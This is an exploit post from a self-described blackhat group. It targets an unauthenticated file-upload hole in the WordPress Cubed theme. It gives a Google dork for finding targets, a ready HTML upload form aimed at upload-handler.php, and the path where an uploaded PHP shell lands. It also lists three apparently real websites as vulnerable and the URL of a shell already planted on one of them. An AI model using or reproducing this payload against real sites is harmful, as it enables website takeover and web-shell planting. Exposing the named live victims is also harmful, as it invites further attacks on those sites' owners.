# Exploit Title: WordPress Cubed Themes Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/09/2013
# Vendor Homepage: http://themeprofessor.com/
# Themes Link: http://www.themeprofessor.com/themeforest-cubed-ultra-customizable-premium-wp-theme-237380/
# Price: Unknown
# Affected Version: v1.0 - v1.2
# Infected File: upload-handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/cubed
# Tested on : Windows/Linux
# Exploit & POC :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/cubed/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php
# Live Site:
-http://lebronjimenez.com/wp/wp-content/themes/cubed/functions/upload-handler.php
-http://www.carpetcleaningwigan.com/wp-content/themes/cubed/functions/upload-handler.php
-http://skilaker.com/wp-content/themes/cubed_v1.0/functions/upload-handler.php
a shell
http://skilaker.com/wp-content/uploads/2013/11/htcv3.php4
# Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./MrN3wb1e ./Official Code-Newbie
# Facebook: https://www.facebook.com/CodeNewbieCrew
# Website: http://www.codenewbie.net
# Malaysia & Indonesia BlackHat
#
# 1337day.com [2015-04-04] #
0 Komentar